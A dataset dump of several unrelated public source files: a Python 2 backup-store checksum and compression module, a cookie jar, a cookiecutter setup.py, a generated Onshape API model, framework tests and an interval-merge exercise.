repo_name (string, 5..92 chars) | path (string, 4..232 chars) | copies (string, 19 classes) | size (string, 4..7 chars) | content (string, 721..1.04M chars) | license (string, 15 classes) | hash (int64) | line_mean (float64, 6.51..99.9) | line_max (int64, 15..997) | alpha_frac (float64, 0.25..0.97) | autogenerated (bool, 1 class)
---|---|---|---|---|---|---|---|---|---|---
quanticio/backupstore | backupstore/src/core/common/metaoperation.py | 1 | 14620 | # coding=utf8
'''
@author : quanticio44
@contact : [email protected]
@license : See with Quanticio44
@summary : metaoperation for rsync complete
@since : 22/08/2014
'''
#Standard package
import os
import hashlib
import zipfile
import tarfile
#Internal package
import backupstoredbfile
import tools
class metaOperation(object):
''' Metadata operations (checksum, compression, database updates) for the backup store '''
verbose = False
def __init__(self, checksum, compression, compressionLevel, compressionAlgo, BSDbFile=None, Verbose=False):
''' Constructor
@param checksum: checksum to sign the file ('md5', 'sha1', 'sha224', 'sha256', 'sha384', 'sha512')
@param compression: compression boolean to compress the archive
@param compressionLevel: compression level used when deflating
@param compressionAlgo: algorithm to use (zip, tar, gzip or bz2)
@param Verbose: Verbosity mode '''
self.verbose = Verbose
self.obj_BSDbFile = None
self.lstFSObjToRemove = ([],[])
if not checksum or checksum.lower() not in hashlib.algorithms:
self.checksum = ''
else:
self.checksum = checksum.lower()
if self.checksum == 'md5':
self.hasher = hashlib.md5
elif self.checksum == 'sha1':
self.hasher = hashlib.sha1
elif self.checksum == 'sha224':
self.hasher = hashlib.sha224
elif self.checksum == 'sha256':
self.hasher = hashlib.sha256
elif self.checksum == 'sha384':
self.hasher = hashlib.sha384
elif self.checksum == 'sha512':
self.hasher = hashlib.sha512
if not compression:
self.compression = 0
else:
self.compression = compression
if not compressionLevel:
self.compressionLevel = 0
else:
self.compressionLevel = compressionLevel
if not compressionAlgo or compressionAlgo not in ('zip', 'tar', 'gzip', 'bz2'):
self.compressionAlgo = 'zip'
else:
self.compressionAlgo = compressionAlgo
if BSDbFile:
self.obj_BSDbFile = backupstoredbfile.BackupStoreDbFile(BSDbFile)
self.obj_BSDbFile.open()
def getChecksumOfFile(self, path, hexaCheckSum=True, BlockSize=65536):
''' Get the checksum of a file
@param path: path of the file to checksum '''
if self.checksum == '':
return
hasher = self.hasher()
with open(path, 'rb') as currentfile:
mybuffer = currentfile.read(BlockSize)
while len(mybuffer) > 0:
hasher.update(mybuffer)
mybuffer = currentfile.read(BlockSize)
if hexaCheckSum:
return hasher.hexdigest()
else:
return hasher.digest()
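# Illustrative usage sketch (added for documentation; the constructor arguments
# below are assumptions, not taken from the original module):
#
#     meta = metaOperation('sha256', False, 0, 'zip')
#     digest = meta.getChecksumOfFile('/tmp/somefile.bin')
#
# Reading in 64 KiB blocks keeps memory usage constant for large files, and an
# empty self.checksum (unknown algorithm) makes the method return None.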
def updateFile(self, path):
''' UpdateMetaData of file in the database
@param path: path of file '''
try:
if not self.obj_BSDbFile:
return
self.obj_BSDbFile.updateFile(name = os.path.basename(path), path=os.path.dirname(path), stat=os.stat(path), checksum=self.getChecksumOfFile(path))
except:
print os.path.basename(path)
print os.path.dirname(path)
print os.stat(path)
print self.getChecksumOfFile(path)
raise
def removeFile(self, path):
''' Remove a file from the database (if it no longer exists on disk)
@param path: path of file '''
if not self.obj_BSDbFile:
return
if not os.path.isfile(path):
self.obj_BSDbFile.removeFileOrFolder(name = os.path.basename(path), path=os.path.dirname(path))
def makeDir(self, pathfolder):
''' Record a folder in the database (the folder must exist on disk)
@param pathfolder: path of folder '''
if not self.obj_BSDbFile:
return
if os.path.isdir(pathfolder):
self.obj_BSDbFile.addFolder(path=pathfolder)
def preRemoveTree(self, path):
''' Pre-remove tree in the database
@param path: path of file '''
if not self.obj_BSDbFile:
return
self.lstFSObjToRemove = self.__getFSObjList(path, [path], [])
def postRemoveTree(self):
''' Post-remove tree in the database (processes the list built by preRemoveTree) '''
if not self.obj_BSDbFile:
return
if len(self.lstFSObjToRemove[0]) == 0 and len(self.lstFSObjToRemove[1]) == 0:
return
# Remove files
for thisfile in self.lstFSObjToRemove[1]:
if not os.path.isfile(thisfile):
self.obj_BSDbFile.removeFileOrFolder(name = os.path.basename(thisfile), path = os.path.dirname(thisfile))
# Remove folders
for thisfolder in self.lstFSObjToRemove[0]:
if not os.path.isdir(thisfolder):
self.obj_BSDbFile.removeFileOrFolder(name = '', path = thisfolder)
def listdir(self, folder):
''' Get all filesystem object in a folder
@param folder: folder path '''
return self.obj_BSDbFile.getObjInFolderList(folder)
def getFSObject(self, path):
''' Get FileSystem object (file or directory)
@path: Path to search
@return: Return a BackupStoreFSObjProperty object '''
return self.obj_BSDbFile.getFSObj(path)
def shouldUpdate(self, cookie, sink, target):
''' Determine whether the file has changed and should be updated
@param cookie: rsync cookie (params of all operation)
@param sink: original path
@param target: BackupStoreFSObjProperty object
@return truthy if the file should be updated '''
try:
sink_st = os.stat(sink)
sink_sz = sink_st.st_size
sink_mt = sink_st.st_mtime
except:
self.log("Fail to retrieve information about sink %s (skip update)" % sink, True)
return 1
try:
target_sz = target.getPropertyInStat(propertyLabel='st_size')
target_mt = target.getPropertyInStat(propertyLabel='st_mtime')
except:
self.log("Fail to retrieve information about sink %s (skip update)" % sink, True)
return 1
try:
if self.getChecksumOfFile(sink) != target.checksum:
return 1
except:
self.log("Fail to retrieve information about sink %s (skip update)" % sink, True)
return 1
if cookie.update:
return target_mt < sink_mt - cookie.modify_window
if cookie.ignore_time:
return 1
if target_sz != sink_sz:
return 1
if cookie.size_only:
return 0
return abs(target_mt - sink_mt) > cookie.modify_window
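# Decision order used above (summary added for documentation, mirroring rsync
# semantics): a stat failure or checksum mismatch forces an update; with
# cookie.update only a newer source (beyond modify_window) triggers one;
# cookie.ignore_time forces one; a size difference forces one; cookie.size_only
# stops there; otherwise modification times are compared within modify_window.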
def isdir(self, folder):
''' Test if a folder exists in the database
@param folder: folder path '''
return self.obj_BSDbFile.isFolder(folder)
def isfile(self, filepath):
''' Test if a file exists in the database
@param filepath: file path '''
return self.obj_BSDbFile.isFile(name = os.path.basename(filepath), path = os.path.dirname(filepath))
def log(self, message, error=False):
''' Log all operation
@param message: Message to log
@param error: Set an error (False by default) '''
if not self.obj_BSDbFile:
return
if error:
self.obj_BSDbFile.addTrace(message, self.obj_BSDbFile.ERROR)
else:
self.obj_BSDbFile.addTrace(message, self.obj_BSDbFile.INFO)
def __getFSObjList(self, path, lst_dir=[], lst_file=[]):
''' Getting the list of folder and file in a root folder
@param path: root folder
@param lst_dir: list of folder
@param lst_file: list of files '''
for obj in os.listdir(path):
abs_path = path + os.sep + obj
if os.path.isfile(abs_path):
lst_file.append(abs_path)
elif os.path.isdir(abs_path):
lst_dir.append(abs_path)
self.__getFSObjList(abs_path, lst_dir, lst_file)
return (lst_dir, lst_file)
def compressData(self, target_dir, filenames):
''' Compress data in the target_dir folder (all files) and clean files
@param target_dir: path to the folder
@param filenames: FileSystem object list '''
if not self.compression:
return
# Getting all files
allAbsFilesLst = []
for curfile in filenames:
if not os.path.isdir(target_dir + os.sep + curfile):
allAbsFilesLst.append(target_dir + os.sep + curfile)
if self.compressionAlgo.lower() == 'zip':
self.__compressDataToZipFile(self.__getArchiveName(target_dir, '.zip'), allAbsFilesLst)
elif self.compressionAlgo.lower() in ('tar', 'gzip', 'bz2'):
self.__compressDataToTarFile(self.__getArchiveName(target_dir, '.' + self.compressionAlgo.lower()), allAbsFilesLst, algo=self.compressionAlgo.lower())
def __getArchiveName(self, target_dir, extension):
''' Getting archive name with extension
@param target_dir: path to the folder
@param extension: Extension of archive
@return: Archive name '''
templatename = 'BS_files_' + extension
ArchiveName = target_dir + os.sep + templatename
nameexist = True
while nameexist:
if os.path.isfile(ArchiveName):
ArchiveName += '.' + templatename
else:
nameexist = False
return ArchiveName
def __compressDataToZipFile(self, zipfilename, allAbsFilesLst):
''' Compress data to a data file in the folder
@param zipfilename: Name of archive
@param allAbsFilesLst: All files to add '''
# Get compression type
if self.compressionLevel <= 1:
compress = zipfile.ZIP_STORED
else:
compress = zipfile.ZIP_DEFLATED
# Size check: if the files in the folder (not in subfolders) total 2 GB or more, enable allowZip64
if tools.folderInformation(os.path.dirname(zipfilename)).getLocalSize() >= 2147483648:
allowZip64 = True
else:
allowZip64 = False
# Create zipfile
with zipfile.ZipFile(zipfilename, 'w', compress, allowZip64=allowZip64) as currentzip:
for curfile in allAbsFilesLst:
currentzip.write(curfile, os.path.basename(curfile))
# Verify and clean
error = ''
if zipfile.is_zipfile(zipfilename):
obj_zip = zipfile.ZipFile(zipfilename, 'r')
if len(obj_zip.namelist()) != len(allAbsFilesLst):
error = 'Archive is not correct (number files is not correct) !'
if obj_zip.testzip() != None:
error = 'Archive is not correct !'
obj_zip.close()
else:
error = 'Archive is not a zipfile !'
# Clean files in the folder
if error == '':
for curfile in allAbsFilesLst:
os.remove(curfile)
else:
if self.verbose:
print error
self.log(error, error=True)
def __compressDataToTarFile(self, tarfilename, allAbsFilesLst, algo='tar'):
''' Compress data to a tar archive in the folder
@param tarfilename: Name of archive
@param allAbsFilesLst: All files to add
@param algo: tar variant to use (tar, gzip or bz2) '''
# Get compression type
mode = 'w'
if algo == 'gzip':
mode += ':gz'
elif algo == 'bz2':
mode += ':bz2'
# Create tarfile
with tarfile.open(tarfilename, mode) as currenttar:
for curfile in allAbsFilesLst:
currenttar.add(curfile, arcname=os.path.basename(curfile), recursive=False)
# Verify and clean
error = ''
currenttar = tarfile.open(tarfilename, 'r')
if len(currenttar.getmembers()) != len(allAbsFilesLst):
error = 'Archive is not correct (number files is not correct) !'
currenttar.close()
# Clean files in the folder
if error == '':
for curfile in allAbsFilesLst:
os.remove(curfile)
else:
if self.verbose:
print error
self.log(error, error=True)
def unCompressData(self, target_dir):
''' Uncompress data in the target_dir folder (all files) and clean archive
@param target_dir: path to the folder '''
if not self.compression:
return
algo = self.compressionAlgo.lower()
ArchiveName = ''
templatename = 'BS_files_' + '.' + self.compressionAlgo
if algo in ('zip', 'tar', 'gzip', 'bz2'):
for name in os.listdir(target_dir):
if os.path.isfile(target_dir + os.sep + name) and name[len(name) - len(templatename):] == templatename:
ArchiveName = target_dir + os.sep + name
break
if ArchiveName == '':
raise EnvironmentError('Archive for uncompress operation not found in %s' % target_dir)
if algo == 'zip':
with zipfile.ZipFile(ArchiveName, 'r') as currentzip:
currentzip.extractall(target_dir)
elif algo in ('tar', 'gzip', 'bz2'):
mode = 'r'
if algo == 'gzip':
mode += ':gz'
elif algo == 'bz2':
mode += ':bz2'
with tarfile.open(ArchiveName, mode) as currenttar:
currenttar.extractall(target_dir)
os.remove(ArchiveName) | gpl-2.0 | -7,056,456,634,023,718,000 | 34.831234 | 158 | 0.5487 | false |
zathras777/atavism | atavism/http11/cookies.py | 1 | 3542 | from datetime import datetime
def stripped_split(ss, c, n=-1):
return [p.strip() for p in ss.split(c, n)]
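# Examples (assumed values, for illustration only):
#     stripped_split('a = 1; b = 2', ';')   -> ['a = 1', 'b = 2']
#     stripped_split('key = v1=v2', '=', 1) -> ['key', 'v1=v2']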
class Cookie(object):
def __init__(self, path=None, key=None, value=None, domain=None, expires=None, max_age=None, secure=False):
self.path = path
self.key = key
self.value = value
self.expires = expires
self.domain = domain
self.max_age = max_age
self.secure = secure
self.http_only = False
def __eq__(self, other):
if other.path != self.path or other.key != self.key or other.domain != self.domain:
return False
return True
def __str__(self):
base = ['{}={}'.format(self.key or '', self.value or '')]
if self.path is not None:
base.append("Path={}".format(self.path))
if self.domain is not None:
base.append("Domain={}".format(self.domain))
if self.http_only:
base.append('HttpOnly')
return "; ".join(base)
def set_expires(self, dtstr):
self.expires = datetime.strptime(dtstr, "%a, %d-%b-%Y %H:%M:%S %Z")
def as_header(self):
return "{}={}".format(self.key, self.value)
def is_relevant(self, _path=None):
if self.expires is not None:
if self.expires < datetime.utcnow():
return False
if _path is None:
return False
if self.path is None or _path == '/':
return True
if _path[:len(self.path)].lower() == self.path.lower():
return True
return False
def __ne__(self, other):
return not self.__eq__(other)
def __lt__(self, other):
if len(self.path) == len(other.path):
return self.key < other.key
return len(self.path) < len(other.path)
def __gt__(self, other):
return len(self.path) > len(other.path)
class CookieJar(object):
def __init__(self):
self.cookies = []
def __len__(self):
return len(self.cookies)
def add_cookie(self, _cookie):
for cc in self.cookies:
if cc == _cookie:
cc.value = _cookie.value
return
self.cookies.append(_cookie)
def __getitem__(self, item):
for c in self.cookies:
if c.key == item:
return c.value
return None
def get_cookie(self, item):
for c in self.cookies:
if c.key == item:
return c
return None
def parse_set_cookie(self, hdr_string):
if '=' not in hdr_string:
return
parts = stripped_split(hdr_string, ';')
c = Cookie()
c.key, c.value = stripped_split(parts[0], '=', 1)
for p in parts[1:]:
if p == 'HttpOnly':
c.http_only = True
continue
k, v = stripped_split(p, '=', 1)
if k.lower() == 'expires':
c.set_expires(v)
else:
setattr(c, k.lower(), v)
self.add_cookie(c)
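# Sketch of what parse_set_cookie does with a typical header value (the header
# below is an assumed example, not taken from the original code):
#
#     jar = CookieJar()
#     jar.parse_set_cookie('sid=abc123; Path=/app; HttpOnly')
#     jar['sid']                  -> 'abc123'
#     jar.get_cookie('sid').path  -> '/app'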
def check_cookies(self, http_obj):
cookies = http_obj.get('set-cookie')
if cookies is None:
return
for c_str in cookies:
self.parse_set_cookie(c_str)
def get_cookies(self, _path):
matched = []
for c in self.cookies:
if c.is_relevant(_path):
matched.append(c)
if len(matched) == 0:
return None
return '; '.join([c.as_header() for c in sorted(matched)])
| unlicense | -4,666,415,880,981,012,000 | 27.111111 | 111 | 0.513552 | false |
rafaelosoto/stream | {{cookiecutter.script_name}}/setup.py | 1 | 2382 | # -*- coding: utf-8 -*-
import re
import sys
from setuptools import setup
from setuptools.command.test import test as TestCommand
REQUIRES = [
'docopt',
]
class PyTest(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
errcode = pytest.main(self.test_args)
sys.exit(errcode)
def find_version(fname):
'''Attempts to find the version number in the file named fname.
Raises RuntimeError if not found.
'''
version = ''
with open(fname, 'r') as fp:
reg = re.compile(r'__version__ = [\'"]([^\'"]*)[\'"]')
for line in fp:
m = reg.match(line)
if m:
version = m.group(1)
break
if not version:
raise RuntimeError('Cannot find version information')
return version
__version__ = find_version("{{ cookiecutter.script_name }}.py")
def read(fname):
with open(fname) as fp:
content = fp.read()
return content
setup(
name='{{ cookiecutter.script_name }}',
version="{{ cookiecutter.version }}",
description='{{ cookiecutter.short_description }}',
long_description=read("README.rst"),
author='{{ cookiecutter.full_name }}',
author_email='{{ cookiecutter.email }}',
url='https://github.com/{{ cookiecutter.github_username }}/{{ cookiecutter.script_name }}',
install_requires=REQUIRES,
license=read("LICENSE"),
zip_safe=False,
keywords='{{ cookiecutter.script_name }}',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
"Programming Language :: Python :: 2",
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy'
],
py_modules=["{{ cookiecutter.script_name }}"],
entry_points={
'console_scripts': [
"{{cookiecutter.script_name}} = {{cookiecutter.script_name}}:main"
]
},
tests_require=['pytest'],
cmdclass={'test': PyTest}
)
| mit | -7,396,378,709,102,490,000 | 28.775 | 95 | 0.594039 | false |
onshape-public/onshape-clients | python/onshape_client/oas/models/btm_configuration_parameter819.py | 1 | 8298 | # coding: utf-8
"""
Onshape REST API
The Onshape REST API consumed by all clients. # noqa: E501
The version of the OpenAPI document: 1.113
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
import sys # noqa: F401
import six # noqa: F401
import nulltype # noqa: F401
from onshape_client.oas.model_utils import ( # noqa: F401
ModelComposed,
ModelNormal,
ModelSimple,
date,
datetime,
file_type,
int,
none_type,
str,
validate_get_composed_info,
)
try:
from onshape_client.oas.models import bt_tree_node20
except ImportError:
bt_tree_node20 = sys.modules["onshape_client.oas.models.bt_tree_node20"]
try:
from onshape_client.oas.models import btm_configuration_parameter_boolean2550
except ImportError:
btm_configuration_parameter_boolean2550 = sys.modules[
"onshape_client.oas.models.btm_configuration_parameter_boolean2550"
]
try:
from onshape_client.oas.models import btm_configuration_parameter_enum105
except ImportError:
btm_configuration_parameter_enum105 = sys.modules[
"onshape_client.oas.models.btm_configuration_parameter_enum105"
]
try:
from onshape_client.oas.models import btm_configuration_parameter_quantity1826
except ImportError:
btm_configuration_parameter_quantity1826 = sys.modules[
"onshape_client.oas.models.btm_configuration_parameter_quantity1826"
]
try:
from onshape_client.oas.models import btm_configuration_parameter_string872
except ImportError:
btm_configuration_parameter_string872 = sys.modules[
"onshape_client.oas.models.btm_configuration_parameter_string872"
]
class BTMConfigurationParameter819(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
("parameter_type",): {
"ENUM": "ENUM",
"BOOLEAN": "BOOLEAN",
"STRING": "STRING",
"QUANTITY": "QUANTITY",
},
}
validations = {}
additional_properties_type = None
@staticmethod
def openapi_types():
"""
This must be a class method so a model may have properties that are
of type self, this ensures that we don't create a cyclic import
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
"bt_type": (str,), # noqa: E501
"generated_parameter_id": (bt_tree_node20.BTTreeNode20,), # noqa: E501
"import_microversion": (str,), # noqa: E501
"node_id": (str,), # noqa: E501
"parameter_id": (str,), # noqa: E501
"parameter_name": (str,), # noqa: E501
"parameter_type": (str,), # noqa: E501
"valid": (bool,), # noqa: E501
}
@staticmethod
def discriminator():
return {
"bt_type": {
"BTMConfigurationParameterString-872": btm_configuration_parameter_string872.BTMConfigurationParameterString872,
"BTMConfigurationParameterEnum-105": btm_configuration_parameter_enum105.BTMConfigurationParameterEnum105,
"BTMConfigurationParameterQuantity-1826": btm_configuration_parameter_quantity1826.BTMConfigurationParameterQuantity1826,
"BTMConfigurationParameterBoolean-2550": btm_configuration_parameter_boolean2550.BTMConfigurationParameterBoolean2550,
},
}
attribute_map = {
"bt_type": "btType", # noqa: E501
"generated_parameter_id": "generatedParameterId", # noqa: E501
"import_microversion": "importMicroversion", # noqa: E501
"node_id": "nodeId", # noqa: E501
"parameter_id": "parameterId", # noqa: E501
"parameter_name": "parameterName", # noqa: E501
"parameter_type": "parameterType", # noqa: E501
"valid": "valid", # noqa: E501
}
@staticmethod
def _composed_schemas():
return None
required_properties = set(
[
"_data_store",
"_check_type",
"_from_server",
"_path_to_item",
"_configuration",
]
)
def __init__(
self,
_check_type=True,
_from_server=False,
_path_to_item=(),
_configuration=None,
**kwargs
): # noqa: E501
"""btm_configuration_parameter819.BTMConfigurationParameter819 - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_from_server (bool): True if the data is from the server
False if the data is from the client (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
bt_type (str): [optional] # noqa: E501
generated_parameter_id (bt_tree_node20.BTTreeNode20): [optional] # noqa: E501
import_microversion (str): [optional] # noqa: E501
node_id (str): [optional] # noqa: E501
parameter_id (str): [optional] # noqa: E501
parameter_name (str): [optional] # noqa: E501
parameter_type (str): [optional] # noqa: E501
valid (bool): [optional] # noqa: E501
"""
self._data_store = {}
self._check_type = _check_type
self._from_server = _from_server
self._path_to_item = _path_to_item
self._configuration = _configuration
for var_name, var_value in six.iteritems(kwargs):
if (
var_name not in self.attribute_map
and self._configuration is not None
and self._configuration.discard_unknown_keys
and self.additional_properties_type is None
):
# discard variable.
continue
setattr(self, var_name, var_value)
@classmethod
def get_discriminator_class(cls, from_server, data):
"""Returns the child class specified by the discriminator"""
discriminator = cls.discriminator()
discr_propertyname_py = list(discriminator.keys())[0]
discr_propertyname_js = cls.attribute_map[discr_propertyname_py]
if from_server:
class_name = data[discr_propertyname_js]
else:
class_name = data[discr_propertyname_py]
class_name_to_discr_class = discriminator[discr_propertyname_py]
return class_name_to_discr_class.get(class_name)
| mit | 8,308,044,639,556,013,000 | 36.718182 | 137 | 0.61075 | false |
Siecje/asphalt | tests/test_application.py | 1 | 6546 | from asyncio import coroutine, new_event_loop, set_event_loop, get_event_loop
from unittest.mock import Mock
import sys
from pkg_resources import EntryPoint
import pytest
from asphalt.core.application import Application
from asphalt.core.component import Component
from asphalt.core.context import ApplicationContext, ContextEventType
from asphalt.core.util import asynchronous
class ShutdownAPI:
def __init__(self, app_ctx: ApplicationContext, method: str):
self.app_ctx = app_ctx
self.method = method
@asynchronous
def shutdown(self):
def callback():
if self.method == 'stop':
get_event_loop().stop()
elif self.method == 'exit':
sys.exit()
else:
raise BaseException('this should crash the application')
def schedule(ctx):
event_loop.call_later(0.1, callback)
event_loop = get_event_loop()
self.app_ctx.add_callback(ContextEventType.started, schedule)
class ShutdownComponent(Component):
def __init__(self, method: str):
self.method = method
def start(self, app_ctx: ApplicationContext):
app_ctx.resources.add(ShutdownAPI(app_ctx, self.method), context_var='shutter')
class CustomApp(Application):
def __init__(self, components=None, **kwargs):
super().__init__(components, **kwargs)
self.start_callback_called = False
self.finish_callback_called = False
@coroutine
def start(self, app_ctx: ApplicationContext):
def started_callback(ctx):
self.start_callback_called = True
def finished_callback(ctx):
self.finish_callback_called = True
app_ctx.add_callback(ContextEventType.started, started_callback)
app_ctx.add_callback(ContextEventType.finished, finished_callback)
app_ctx.shutter.shutdown()
class TestApplication:
@pytest.fixture
def event_loop(self):
event_loop = new_event_loop()
set_event_loop(event_loop)
return event_loop
@pytest.fixture
def app(self):
app = CustomApp()
app.component_types['shutdown'] = ShutdownComponent
return app
@pytest.mark.parametrize('use_entrypoint', [True, False], ids=['entrypoint', 'explicit_class'])
def test_add_component(self, use_entrypoint):
"""
Tests that add_component works both with and without an entry point and that external
configuration overrides local (hardcoded) configuration values.
"""
app = CustomApp({'shutdown': {'method': 'stop'}})
if not use_entrypoint:
app.add_component('shutdown', ShutdownComponent, method='exception')
else:
entrypoint = EntryPoint('shutdown', __spec__.name)
entrypoint.load = Mock(return_value=ShutdownComponent)
app.component_types['shutdown'] = entrypoint
app.add_component('shutdown', method='exception')
assert len(app.components) == 1
assert isinstance(app.components[0], ShutdownComponent)
assert app.components[0].method == 'stop'
@pytest.mark.parametrize('alias, cls, exc_cls, message', [
('', None, TypeError, 'component_alias must be a nonempty string'),
(6, None, TypeError, 'component_alias must be a nonempty string'),
('foo', None, LookupError, 'no such component type: foo'),
('foo', int, TypeError, 'the component class must be a subclass of asphalt.core.Component')
])
def test_add_component_errors(self, app, alias, cls, exc_cls, message):
exc = pytest.raises(exc_cls, app.add_component, alias, cls)
assert str(exc.value) == message
@pytest.mark.parametrize('shutdown_method', ['stop', 'exit'])
@pytest.mark.parametrize('logging_config', [
True,
{'version': 1, 'loggers': {'asphalt': {'level': 'INFO'}}}
], ids=['basic', 'dictconfig'])
def test_run(self, event_loop, app, caplog, shutdown_method, logging_config):
"""
Tests that both started and finished callbacks are run when the application is started and
shut down properly.
"""
app.add_component('shutdown', method=shutdown_method)
app.logging_config = logging_config
app.run(event_loop)
assert app.start_callback_called
assert app.finish_callback_called
records = [record for record in caplog.records() if record.name == 'asphalt.core']
assert len(records) == 4
assert records[0].message == 'Starting components'
assert records[1].message == 'All components started'
assert records[2].message == 'Application started'
assert records[3].message == 'Application stopped'
def test_start_exception(self, event_loop, app, caplog):
"""
Tests that an exception caught during the application initialization is put into the
application context and made available to finish callbacks.
"""
def finish(app_ctx):
nonlocal exception
exception = app_ctx.exception
def start(app_ctx: ApplicationContext):
app_ctx.add_callback(ContextEventType.finished, finish)
raise Exception('bad component')
exception = None
app.start = start
app.add_component('shutdown', method='stop')
app.run(event_loop)
assert str(exception) == 'bad component'
records = [record for record in caplog.records() if record.name == 'asphalt.core']
assert len(records) == 4
assert records[0].message == 'Starting components'
assert records[1].message == 'All components started'
assert records[2].message == 'Error during application startup'
assert records[3].message == 'Application stopped'
def test_run_baseexception(self, event_loop, app, caplog):
"""
Tests that BaseExceptions aren't caught anywhere in the stack and crash the application.
"""
app.add_component('shutdown', method='exception')
exc = pytest.raises(BaseException, app.run, event_loop)
assert str(exc.value) == 'this should crash the application'
assert app.start_callback_called
records = [record for record in caplog.records() if record.name == 'asphalt.core']
assert len(records) == 3
assert records[0].message == 'Starting components'
assert records[1].message == 'All components started'
assert records[2].message == 'Application started'
| apache-2.0 | -4,469,244,306,901,962,000 | 37.280702 | 99 | 0.643294 | false |
m-ober/byceps | tests/api/tourney/match/comments/test_get_comments_for_match.py | 1 | 3509 | """
:Copyright: 2006-2020 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
import pytest
from byceps.services.tourney import (
match_comment_service as comment_service,
match_service,
)
def test_get_comments_for_match(
api_client, api_client_authz_header, match, comment
):
url = f'/api/tourney/matches/{match.id}/comments'
headers = [api_client_authz_header]
response = api_client.get(url, headers=headers)
assert response.status_code == 200
assert response.content_type == 'application/json'
assert response.get_json() == {
'comments': [
{
'comment_id': str(comment.id),
'match_id': str(comment.match_id),
'created_at': comment.created_at.isoformat(),
'creator': {
'user_id': str(comment.created_by.id),
'screen_name': comment.created_by.screen_name,
'suspended': False,
'deleted': False,
'avatar_url': None,
'is_orga': False,
},
'body_text': 'Denn man tau.',
'body_html': 'Denn man tau.',
'last_edited_at': None,
'last_editor': None,
'hidden': False,
'hidden_at': None,
'hidden_by_id': None,
}
]
}
def test_get_comments_for_match_with_edited_comment(
api_client, api_client_authz_header, match, edited_comment
):
url = f'/api/tourney/matches/{match.id}/comments'
headers = [api_client_authz_header]
response = api_client.get(url, headers=headers)
assert response.status_code == 200
assert response.content_type == 'application/json'
assert response.get_json() == {
'comments': [
{
'comment_id': str(edited_comment.id),
'match_id': str(edited_comment.match_id),
'created_at': edited_comment.created_at.isoformat(),
'creator': {
'user_id': str(edited_comment.created_by.id),
'screen_name': edited_comment.created_by.screen_name,
'suspended': False,
'deleted': False,
'avatar_url': None,
'is_orga': False,
},
'body_text': '[b]So nicht[/b], Freundchen!',
'body_html': '<strong>So nicht</strong>, Freundchen!',
'last_edited_at': edited_comment.last_edited_at.isoformat(),
'last_editor': {
'user_id': str(edited_comment.last_edited_by.id),
'screen_name': edited_comment.last_edited_by.screen_name,
'suspended': False,
'deleted': False,
'avatar_url': None,
'is_orga': False,
},
'hidden': False,
'hidden_at': None,
'hidden_by_id': None,
}
]
}
# helpers
@pytest.fixture
def match(app):
return match_service.create_match()
@pytest.fixture
def comment(app, match, user):
return comment_service.create_comment(match.id, user.id, 'Denn man tau.')
@pytest.fixture
def edited_comment(app, comment, admin):
comment_service.update_comment(
comment.id, admin.id, '[b]So nicht[/b], Freundchen!'
)
return comment_service.get_comment(comment.id)
| bsd-3-clause | -1,295,547,686,589,896,400 | 31.192661 | 77 | 0.520946 | false |
yaolei313/python-study | algorithm_study/region_merge.py | 1 | 3025 | # Definition for an interval.
class Interval:
def __init__(self, s=0, e=0):
self.start = s
self.end = e
def __str__(self):
return "[{},{}]".format(self.start, self.end)
class Solution:
def merge(self, intervals):
"""
:type intervals: List[Interval]
:rtype: List[Interval]
"""
if intervals is None:
return []
elif len(intervals) == 1:
return intervals
# self.quickSort(intervals, 0, len(intervals) - 1, lambda x: x.start)
intervals.sort(key=lambda x: x.start)
for interval in intervals:
print('%s' % interval, end='')
print()
rst = []
region_left = None
region_right = None
for t1 in intervals:
if region_left is None:
region_left = t1.start
region_right = t1.end
continue
if region_right >= t1.start:
region_right = max(region_right, t1.end)
else:
rst.append(Interval(region_left, region_right))
region_left = t1.start
region_right = t1.end
if region_left is not None:
rst.append(Interval(region_left, region_right))
return rst
def quickSort(self, lst, l, r, func):
if l >= r:
return
key_idx = l
key = lst[l]
compare_key = func(lst[l])
i, j = l, r
while i < j:
while func(lst[j]) >= compare_key and i < j:
j -= 1
if i < j:
lst[key_idx] = lst[j]
while func(lst[i]) <= compare_key and i < j:
i += 1
if i < j:
lst[j] = lst[i]
key_idx = i
lst[key_idx] = key
self.quickSort(lst, l, key_idx - 1, func)
self.quickSort(lst, key_idx + 1, r, func)
def quickSort2(self, lst, l, r):
"""
:type lst: List[int]
:rtype List[int]
"""
if l < r:
key = lst[l]
i = l
j = r
while i < j:
while lst[j] >= key and i < j:
j -= 1
if i < j:
lst[i] = lst[j]
while lst[i] <= key and i < j:
i += 1
if i < j:
lst[j] = lst[i]
lst[i] = key
self.quickSort2(lst, l, i - 1)
self.quickSort2(lst, i + 1, r)
if __name__ == "__main__":
t = Solution()
input_grid = [Interval(1, 3), Interval(8, 10), Interval(2, 6), Interval(15, 18)]
t_result = t.merge(input_grid)
for item in t_result:
print('%s' % item, end='')
# input_array = [2, 5, 33, 2, 17, 5, 2]
# t.quickSort(input_array, 0, len(input_array) - 1, lambda x: x)
# print(input_array)
